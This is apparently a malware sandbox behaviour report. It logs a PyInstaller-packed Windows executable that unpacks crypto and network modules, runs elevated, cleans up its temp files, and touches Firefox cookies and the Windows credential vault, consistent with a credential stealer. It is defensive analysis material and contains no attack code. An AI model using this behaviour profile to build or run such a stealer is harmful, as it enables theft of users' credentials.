File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, size = 106496 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, size = 3584 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, size = 8192 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, size = 3584 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 315392, size_out = 315392 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll, size = 552960 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 258048, size_out = 258048 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, size = 688128 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, size = 512 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 8192, size_out = 8192 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, size = 20480 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, size = 3584 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 8192, size_out = 8192 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, size = 24576 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, size = 512 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create Directory C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, size = 20480 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, size = 841 True 1
Fn
Data
Environment Set Environment String name = _MEIPASS2, value = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Environment Get Environment String name = _MEIPASS2, result_out = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Process Create process_name = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, os_pid = 0xbb8, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_SHOWNORMAL True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h True 1
Fn
File Delete Directory directory = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd True 1
Fn
File Delete Directory directory = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Module Get Handle module_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, base_address = 0x1250000 True 2
Fn
Module Load module_name = api-ms-win-appmodel-runtime-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = ext-ms-win-kernel32-package-current-l1-1-0, base_address = 0x0 False 2
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #6: vkvmtnchwv3w.exe
873 203
Information Value
ID #6
File Name c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe
Command Line "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:19, Reason: Child Process
Unmonitor End Time: 00:01:22, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
Information Value
PID 0xbb8
Parent PID 0xba4 (c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xBBC
0xBC0
0xBC4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
locale.nls 0x00040000 0x000a6fff Memory Mapped File r False False False -
pagefile_0x00000000000b0000 0x000b0000 0x000b0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory r True False False -
imm32.dll 0x000d0000 0x000ecfff Memory Mapped File r False False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory rw True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
tzres.dll 0x000f0000 0x000f0fff Memory Mapped File r False False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000100000 0x00100000 0x00106fff Pagefile Backed Memory r True False False -
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory rw True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory rw True False False -
private_0x0000000000220000 0x00220000 0x00220fff Private Memory rwx True False False -
pagefile_0x0000000000230000 0x00230000 0x00230fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000240000 0x00240000 0x00240fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory r True False False -
private_0x0000000000270000 0x00270000 0x0036ffff Private Memory rw True False False -
pagefile_0x0000000000370000 0x00370000 0x00437fff Pagefile Backed Memory r True False False -
rsaenh.dll 0x00440000 0x0047bfff Memory Mapped File r False False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory r True False False -
cookies.sqlite-shm 0x00450000 0x00457fff Memory Mapped File rw True True False
private_0x00000000004a0000 0x004a0000 0x004affff Private Memory rw True False False -
pagefile_0x00000000004b0000 0x004b0000 0x005b0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000005c0000 0x005c0000 0x011bffff Pagefile Backed Memory r True False False -
vkvmtnchwv3w.exe 0x01250000 0x0129dfff Memory Mapped File rwx True True False
private_0x00000000012a0000 0x012a0000 0x0138ffff Private Memory rw True False False -
kernelbase.dll.mui 0x012a0000 0x0135ffff Memory Mapped File rw False False False -
private_0x0000000001380000 0x01380000 0x0138ffff Private Memory rw True False False -
private_0x0000000001390000 0x01390000 0x0148ffff Private Memory rw True False False -
pagefile_0x0000000001490000 0x01490000 0x01882fff Pagefile Backed Memory r True False False -
private_0x0000000001890000 0x01890000 0x01a8ffff Private Memory rw True False False -
sortdefault.nls 0x01a90000 0x01d5efff Memory Mapped File r False False False -
private_0x0000000001d60000 0x01d60000 0x0215ffff Private Memory rw True False False -
private_0x0000000002160000 0x02160000 0x0226ffff Private Memory rw True False False -
private_0x0000000002160000 0x02160000 0x021fffff Private Memory rw True False False -
private_0x0000000002230000 0x02230000 0x0226ffff Private Memory rw True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory rw True False False -
private_0x0000000002420000 0x02420000 0x02743fff Private Memory rw True False False -
private_0x0000000002420000 0x02420000 0x0261ffff Private Memory rw True False False -
private_0x0000000002420000 0x02420000 0x0251ffff Private Memory rw True False False -
private_0x00000000025e0000 0x025e0000 0x0261ffff Private Memory rw True False False -
crypto.cipher._des3.pyd 0x10000000 0x1000ffff Memory Mapped File rwx True False False -
_hashlib.pyd 0x6a8b0000 0x6a9adfff Memory Mapped File rwx True False False -
python27.dll 0x6a9b0000 0x6ac47fff Memory Mapped File rwx True True False
sqlite3.dll 0x6b2c0000 0x6b34afff Memory Mapped File rwx True False False -
_ssl.pyd 0x6b350000 0x6b4acfff Memory Mapped File rwx True False False -
_sqlite3.pyd 0x6e170000 0x6e17ffff Memory Mapped File rwx True False False -
vaultcli.dll 0x6e710000 0x6e71bfff Memory Mapped File rwx False False False -
_socket.pyd 0x6e720000 0x6e72efff Memory Mapped File rwx True False False -
_ctypes.pyd 0x6ee80000 0x6ee99fff Memory Mapped File rwx True False False -
rasadhlp.dll 0x704a0000 0x704a5fff Memory Mapped File rwx False False False -
msvcr90.dll 0x713b0000 0x71452fff Memory Mapped File rwx False False False -
api-ms-win-core-synch-l1-2-0.dll 0x71f10000 0x71f12fff Memory Mapped File rwx False False False -
fwpuclnt.dll 0x736b0000 0x736e7fff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
wshtcpip.dll 0x74960000 0x74964fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
wship6.dll 0x74e00000 0x74e05fff Memory Mapped File rwx False False False -
mswsock.dll 0x74e10000 0x74e4bfff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
msasn1.dll 0x753f0000 0x753fbfff Memory Mapped File rwx False False False -
crypt32.dll 0x75420000 0x7553cfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Created Files
Filename File Size Hash Values YARA Match Actions
C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm 32.00 KB MD5: b7c14ec6110fa820ca6b65f5aec85911
SHA1: 608eeb7488042453c9ca40f7e1398fc1a270f3f4
SHA256: fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb
SSDeep: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
YARA Match: False
c:\users\eebsym5\appdata\local\temp\fvwresvqqzq 18.00 KB MD5: 29844404ae855e9df054833f71888eb1
SHA1: 3e86f08def08fc14ddec0227d0643319562666db
SHA256: c381401ea96dfe9b926126dcbbc0dd6ab541dbf549732cc6c66f20096b1f663e
SSDeep: 24:LLijhJ0KL7G0TMJHUyyJtmCm0u6lOKQAE9V8FsffDVOzeCmly6UwcTa/HMQW:wz+JH3yJUhJCVE9V8FsXhFlNU1Ts3W
YARA Match: False
c:\users\eebsym5\appdata\local\temp\mybrs.log 0.44 KB MD5: 377177eb667fc31310cdb419f8bd0f7e
SHA1: 35e3ca98b5c49caa247124c0d59371b5c78c8fba
SHA256: d26f31f843b61ace4513d28f98424e24acc9e89b0520e211a3d8b7100a28b4ce
SSDeep: 12:qrgteH0H2M+LNhPibo+zcMEuKFaJg7ndc1K:IKONhKF/EuKFaJimK
YARA Match: False
c:\users\eebsym5\appdata\local\temp\9r5qk2 0.00 KB MD5: 3f1d1d8d87177d3d8d897d7e421f84d6
SHA1: dd082d742a5cb751290f1db2bd519c286aa86d95
SHA256: f02285fb90ed8c81531fe78cf4e2abb68a62be73ee7d317623e2c3e3aefdfff2
SSDeep: 3:qn:qn
YARA Match: False
c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe 7.00 KB MD5: e0005de376874498d2f66f6503cf1399
SHA1: baec963b5918094a50a4b08292bb230eeebd6897
SHA256: 32812d196066c99bf3852fad78b00063dc68e6cc5fb26ae6c862c8c5777d51b0
SSDeep: 48:tNecVTgPOpEveoJZFrU10WBcPz9K4t9EiDYo:tVSNDX2AK4t9p
YARA Match: False
c:\users\eebsym5\appdata\local\temp\mybrs.log 0.13 KB MD5: a4aa7ec6ac16506a35f56d57e1d1f51f
SHA1: 8cdd756595a2431228ff25b615ed50de783dc365
SHA256: d6ab363af3135a13c026ba865909a83010f2c1ce4f40ceecd61aedd649a80c47
SSDeep: 3:dXAaI+n4t+divXf4hQgFu5wWDl7Qp4EaKC50HE9jnI0ZAFyn:dQaI+4t3Xf4tFuNFQ/aZ50HE9bRZx
False
c:\users\eebsym5\appdata\local\temp\mybrs.log 0.36 KB MD5: 4e8a981abf12a8d545be3921c4a72102
SHA1: d7668647c81060e2346aa8d2a515f0914337853d
SHA256: 665ac4f11caaab2e42eeb26d61d003c12df62d45014be29413cca90d45ff08d2
SSDeep: 6:dQaI+4t3Xf4tFuNFQ/aZ50HE9bRZUaI+oXf4LHthUUDGbbTAaI+oXf4zcMEuKFbn:qrgteH0H2M+LNhPibo+zcMEuKFb
False
c:\users\eebsym5\appdata\local\temp\mybrs.log 0.24 KB MD5: 5c8b016bbcb1cbf277be5e98740e7d94
SHA1: 722545a1a7fd6ed18658119024d8ff09019278b6
SHA256: 5414514a3c32f3d02be8258a4c7f8588161414b84c5101e4571d058352b9f455
SSDeep: 6:dQaI+4t3Xf4tFuNFQ/aZ50HE9bRZUaI+oXf4LHthUUDGbbZ:qrgteH0H2M+LNhPibd
False
Threads
Thread 0xbbc
873 41
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:09:14 (UTC) True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x71f10000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7696418d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x769676e6 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x71f10000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7696418d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76961e16 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x769676e6 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7699f72b True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Environment Get Environment String name = _MEIPASS2, result_out = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Environment Set Environment String name = _MEIPASS2 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
